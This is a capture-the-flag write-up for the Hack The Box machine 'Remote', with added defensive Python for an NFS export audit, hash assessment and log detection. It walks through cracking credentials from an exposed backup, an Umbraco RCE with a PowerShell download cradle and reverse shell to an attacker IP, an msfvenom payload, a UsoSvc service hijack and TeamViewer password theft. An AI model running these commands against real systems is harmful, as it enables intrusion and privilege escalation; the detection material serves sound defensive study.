
Remote is a Windows machine rated easy on Hack The Box. It consists of finding credentials in an exposed backup, using them with an Umbraco RCE exploit to obtain initial access, and then abusing the UsoSvc service to gain a full-privilege shell. Alternatively, TeamViewer 7 can be exploited to obtain the Administrator credentials.
Enumeration
Running nmap:
nmap -sC -sV 10.10.10.180
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-03 15:57 CEST
Nmap scan report for 10.10.10.180
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Home - Acme Widgets
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
2049/tcp open mountd 1-3 (RPC #100005)
Browsing to port 80 we find the Acme Widgets home page.
Running gobuster we find an interesting directory:
gobuster dir -u 10.10.10.180 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 200 -q
/home (Status: 200)
/blog (Status: 200)
/people (Status: 200)
/products (Status: 200)
/contact (Status: 200)
/install (Status: 302)
/about-us (Status: 200)
Browsing to /install we discover the site is running Umbraco.
As the RPC and NFS services are open, we can list the exports:
showmount -e 10.10.10.180
Export list for 10.10.10.180:
/site_backups (everyone)
This backup is exported to everyone, so we can mount it on our machine:
mount -t nfs 10.10.10.180:/site_backups /mnt
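The world-accessible export is the root cause of this foothold, so it is worth being able to spot one quickly. The following Python is an added example (not part of the original write-up): it parses the listing printed by showmount -e and reports exports that any host may mount. The /site_backups line in the sample is the one shown above; the other two export lines are constructed to illustrate client lists and the "*" form used by Linux exports.

```python
"""Audit an NFS export list as printed by showmount -e and flag exports that
any host may mount. Added example for this write-up, not part of the post."""

# Constructed sample: the /site_backups line is the one from the write-up,
# the other two exports are made up to show client lists and the "*" form.
SAMPLE_SHOWMOUNT = """Export list for 10.10.10.180:
/site_backups (everyone)
/srv/share     10.10.10.0/24,10.10.14.5
/srv/public    *
"""

# Client specifications that mean "any host" (Windows NFS prints "everyone",
# Linux exportfs prints "*").
ANY_HOST = {"everyone", "*"}


def parse_showmount(text):
    """Return [(export_path, [client, ...]), ...] from showmount -e output."""
    exports = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.lower().startswith("export list"):
            continue
        # The path never contains spaces; everything after it is the client list.
        path, _, clients = line.partition(" ")
        clients = clients.strip().strip("()")
        exports.append((path, [c.strip() for c in clients.split(",") if c.strip()]))
    return exports


def world_mountable(text):
    """Export paths whose client list allows any host to mount them."""
    return [path for path, clients in parse_showmount(text)
            if any(c.lower() in ANY_HOST for c in clients)]


if __name__ == "__main__":
    for path in world_mountable(SAMPLE_SHOWMOUNT):
        print(f"world-mountable export: {path}")
```

Run against real showmount output, anything reported here should be restricted to the hosts that need it or, for a backup directory like this one, not exported at all.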
Inside App_Data we find an interesting file, Umbraco.sdf; running strings on it reveals useful information:
strings Umbraco.sdf | head
admin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}
There we have a user and a hashed password. We can crack it using john:
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
john --show hash.txt
admin@htb.local:baconandcheese
1 password hash cracked, 0 left
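The digest cracks this quickly because it is an unsalted SHA1: the same password always yields the same digest, so a wordlist can be hashed once and compared against every account. As an added example (not code from the write-up or from Umbraco), the Python below splits the run-together record that strings printed into its three fields, reports the scheme, and contrasts the legacy check with a salted, iterated PBKDF2 store. That the legacy format is hex(SHA1(password)) with no salt is an assumption consistent with john cracking it directly; the PBKDF2 format is this example's own.

```python
"""Parse a password record recovered from Umbraco.sdf and assess the hashing
scheme. Added example for this write-up, not Umbraco's own code."""
import hashlib
import hmac
import json
import os
import re

# The record exactly as strings printed it: email, hex digest and JSON
# metadata run together with no separator (copied from the write-up).
RECORD = 'admin@htb.localb8be16afba8c314ad33d812f22a04991b90e2aaa{"hashAlgorithm":"SHA1"}'

# 40 hex characters immediately followed by a JSON object anchor the split;
# the non-greedy email group stops at the first point where that fits.
_REC = re.compile(r'^(?P<email>\S+?)(?P<hash>[0-9a-fA-F]{40})(?P<meta>\{.*\})$')


def parse_record(line):
    """Return {'email', 'hash', 'algorithm'} from one strings-style record."""
    m = _REC.match(line.strip())
    if not m:
        raise ValueError("not an email+SHA1+json record")
    meta = json.loads(m["meta"])
    return {"email": m["email"], "hash": m["hash"].lower(),
            "algorithm": meta.get("hashAlgorithm")}


def assess(record):
    """One-line verdict on why the stored digest is crackable offline."""
    alg = (record["algorithm"] or "").upper()
    if alg in ("SHA1", "MD5", "SHA256"):
        return f"weak: unsalted {alg}; identical passwords share one digest"
    return f"review: {alg or 'unknown'} scheme"


def legacy_sha1(password):
    """Assumed legacy format: hex(SHA1(password)), no salt, no iterations."""
    return hashlib.sha1(password.encode()).hexdigest()


def verify_legacy_sha1(password, hexdigest):
    return hmac.compare_digest(legacy_sha1(password), hexdigest.lower())


# Hardened alternative used for contrast: random salt + iterated PBKDF2.
def make_pbkdf2(password, iterations=200_000):
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_pbkdf2(password, stored):
    _, iters, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    rec = parse_record(RECORD)
    print(rec["email"], rec["algorithm"], "->", assess(rec))
```

The practical point for a defender is in the last two functions: with a per-user salt and a high iteration count, two users with the same password no longer share a digest and each guess costs the attacker the full iteration count, so a leaked database file like this one is far less useful.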
Exploitation
With this set of credentials we can log in to /install, where we discover the site is running Umbraco 7.12.4.
The following RCE exploit was found: https://www.exploit-db.com/exploits/46153.
Nishang's Invoke-PowerShellTcp.ps1 will be uploaded to obtain a PowerShell reverse shell.
First we set up a Python HTTP server on the port the download URLs below use:
python -m SimpleHTTPServer 800
Then the following line is appended to the PowerShell script so the reverse shell triggers automatically once the script is downloaded and executed:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.26 -Port 443
Now we run the exploit:
python exploit.py -u admin@htb.local -p baconandcheese -i 'http://10.10.10.180' -c powershell.exe -a "IEX(New-Object Net.WebClient).downloadString('http://10.10.15.26:800/Invoke-PowerShellTcp.ps1')"
And we obtain a reverse shell in netcat:
nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.15.26] from (UNKNOWN) [10.10.10.180] 49759
Windows PowerShell running as user REMOTE$ on REMOTE
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv> $env:UserName
REMOTE$
Privilege Escalation Method #1
To enumerate the system we will use the PowerUp PowerShell script: https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
We upload it to the machine and load it into memory:
PS C:\windows\temp> invoke-webrequest -Uri http://10.10.15.26:800/PowerUp.ps1 -OutFile PowerUp.ps1
PS C:\windows\temp> . .\PowerUp.ps1
Running it we obtain an interesting output:
PS C:\windows\temp> Invoke-AllChecks
[*] Running Invoke-AllChecks
[*] Checking service permissions...
ServiceName : UsoSvc
Path : C:\Users\Public\fremote.exe
StartName : LocalSystem
AbuseFunction : Invoke-ServiceAbuse -ServiceName 'UsoSvc'
The service runs as LocalSystem and its configuration can be modified, so we can exploit it as follows.
First, we create a shell with msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.15.26 LPORT=4444 -f exe >shell.exe
Then we stop the service, point its binary path at our shell and start it again (note that sc.exe requires the space after binPath=, and that in PowerShell the bare name sc resolves to the Set-Content alias, hence sc.exe):
PS C:\windows\temp> sc.exe stop UsoSvc
PS C:\windows\temp> sc.exe config UsoSvc binPath= "C:\windows\temp\shell.exe"
PS C:\windows\temp> sc.exe start UsoSvc
And we obtain a shell as nt authority\system:
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.15.26] from (UNKNOWN) [10.10.10.180] 49691
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
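Both the initial access step and this privilege escalation leave distinctive traces. The download cradle used to fetch Invoke-PowerShellTcp.ps1 shows up in PowerShell script block logging (Event ID 4104), and the binPath change is written to the service's ImagePath registry value by the Service Control Manager, which Sysmon records as a registry value set (Event ID 13) with services.exe as the writing image. The following Python is an added example, not part of the write-up: the events are constructed to resemble those records, the field names follow the Sysmon and PowerShell event schemas as assumed here, and the list of user-writable directories is this example's own choice.

```python
"""Detection logic for two steps in this write-up: the PowerShell download
cradle and the UsoSvc ImagePath rewrite. Added example; the events below are
constructed to look like Windows/Sysmon records, not real logs from the box."""
import re

# Constructed events in a flattened (source, id, fields) shape.
EVENTS = [
    {"source": "PowerShell", "id": 4104, "ScriptBlockText":
     "IEX(New-Object Net.WebClient).downloadString('http://10.10.15.26:800/Invoke-PowerShellTcp.ps1')"},
    {"source": "PowerShell", "id": 4104, "ScriptBlockText":
     "Get-ChildItem C:\\inetpub\\wwwroot | Measure-Object"},
    # sc.exe config calls ChangeServiceConfig; the registry write itself is
    # performed by services.exe, so Image is the SCM, not sc.exe.
    {"source": "Sysmon", "id": 13,
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\UsoSvc\ImagePath",
     "Details": r"C:\windows\temp\shell.exe",
     "Image": r"C:\Windows\System32\services.exe"},
    {"source": "Sysmon", "id": 13,
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\UsoSvc\ImagePath",
     "Details": r"C:\Windows\system32\svchost.exe -k netsvcs -p",
     "Image": r"C:\Windows\System32\services.exe"},
]

# Invoke-Expression fed by a web download in the same script block.
CRADLE = re.compile(
    r"\b(iex|invoke-expression)\b.*?(downloadstring|downloadfile|webclient|invoke-webrequest)",
    re.I)

# ImagePath value of any service under the SCM key.
IMAGEPATH = re.compile(r"\\Services\\(?P<svc>[^\\]+)\\ImagePath$", re.I)

# Directories a low-privileged account can write to; a service binary living
# here (C:\Users\Public\fremote.exe in the PowerUp output above is one) is a
# finding in itself, and a change *to* such a path is the abuse step.
WRITABLE_DIRS = ("c:\\users\\", "c:\\windows\\temp\\", "c:\\programdata\\", "c:\\temp\\")


def in_writable_dir(image_path):
    """True when the (possibly quoted, possibly argument-bearing) path starts
    in a user-writable directory."""
    p = image_path.strip().strip('"').lower()
    return p.startswith(WRITABLE_DIRS)


def detect(events):
    """Return (rule_name, detail) tuples for every matching event."""
    alerts = []
    for ev in events:
        if ev["source"] == "PowerShell" and ev["id"] == 4104:
            text = ev.get("ScriptBlockText", "")
            if CRADLE.search(text):
                alerts.append(("ps_download_cradle", text[:60]))
        elif ev["source"] == "Sysmon" and ev["id"] == 13:
            m = IMAGEPATH.search(ev.get("TargetObject", ""))
            if m and in_writable_dir(ev.get("Details", "")):
                alerts.append(("service_imagepath_to_writable_dir", m["svc"]))
    return alerts


if __name__ == "__main__":
    for rule, detail in detect(EVENTS):
        print(f"{rule}: {detail}")
```

The second rule deliberately ignores the legitimate svchost.exe ImagePath so that routine service servicing does not page anyone; in a real deployment it would sit alongside an audit of which services grant SERVICE_CHANGE_CONFIG to non-administrators, which is the underlying misconfiguration PowerUp reported.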
Privilege Escalation Method #2
Enumerating the system, we find TeamViewer version 7 installed:
C:\Program Files (x86)>cd TeamViewer
C:\Program Files (x86)\TeamViewer>dir
Directory of C:\Program Files (x86)\TeamViewer
02/20/2020 03:14 AM <DIR> .
02/20/2020 03:14 AM <DIR> ..
02/27/2020 11:35 AM <DIR> Version7
This version is vulnerable to a credential disclosure exploit: https://www.rapid7.com/db/modules/post/windows/gather/credentials/teamviewer_passwords
Using Metasploit we can obtain the Administrator credentials:
msf5 post(windows/gather/credentials/teamviewer_passwords) > exploit
[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!
With this, we can use evil-winrm to log in as Administrator:
evil-winrm -u Administrator -p '!R3m0te!' -i 10.10.10.180
Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
remote\administrator